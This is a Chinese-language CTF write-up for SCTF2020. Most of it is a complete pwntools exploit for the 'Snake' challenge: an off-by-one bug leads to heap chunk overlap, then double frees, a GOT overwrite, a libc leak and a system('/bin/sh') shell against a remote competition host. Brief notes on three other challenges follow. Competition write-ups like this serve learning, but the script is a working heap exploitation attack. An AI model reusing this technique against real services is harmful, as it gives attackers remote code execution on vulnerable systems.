SCTF2020

Snake

在輸入的地方有一次off by one的機會通過構造堆塊重疊然後做2次double free改寫got拿到shell
exp:

from pwn import *
p=remote('39.107.244.116',9999)
#p=process('./snake')
elf=ELF('./snake')
libc=elf.libc

def add(idx,size,data):
	p.sendlineafter('name','1')
	p.sendlineafter('?',str(idx))
	p.sendlineafter('?',str(size))
	p.sendafter('?',data)

def delete(idx):
	p.sendlineafter('name','2')
	p.sendlineafter('?',str(idx))

def get_name(idx):
	p.sendlineafter('name','3')
	p.sendlineafter('?',str(idx))

def start_game():
	p.sendlineafter('name','4')

def if_exit(bol):
	p.sendlineafter('exit?',bol)

p.sendlineafter('?',str(0x30))
p.sendafter('name','doudou')
for i in range(36):
	p.send('\n')
p.sendafter('words:','a'*(0x4d-9)+p64(0)+'\xa1')
if_exit('n')
add(1,0x50,'aaaa')#0x602ffa
add(2,0x58,'aaaa')
add(3,0x50,'aaaa')
add(4,0x28,'aaaa')
delete(0)
add(0,0x30,'aaa')
add(5,0x50,'bbb')#5=2
delete(1)
delete(3)
delete(5)
add(1,0x50,p64(0x602ffa))
add(3,0x50,'aaa')
add(5,0x50,'bbb')
add(6,0x50,'\x11'*0xe)
get_name(6)
start_game()
for i in range(36):
	p.send('\n')
#sleep(2)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
if_exit('n')
delete(1)
delete(3)
delete(5)
add(1,0x50,p64(0x602ffa))
add(3,0x50,'aaa')
add(5,0x50,'/bin/sh\x00')
add(7,0x50,'a'*0xe+p64(system))
delete(5)
#p.sendafter('words:','a'*(0x4d-9)+p64(0)+'\xa1')
p.interactive()
print hex(libcbase)

Dou dizhu

這個題目地主贏了就有flag
直接開3個瀏覽器 一起玩硬拿flag

Can you hear

在ctf.show上面好像有相同的使用msstv工具

Coolcode

漏洞點是在申請堆塊的時候會得到一個指針可能會把指針寫到got表上面通過調用函數來調用shellcode但是shellcode需要shuzi和字母且長度有限制在比賽時未繞過等賽後觀摩wp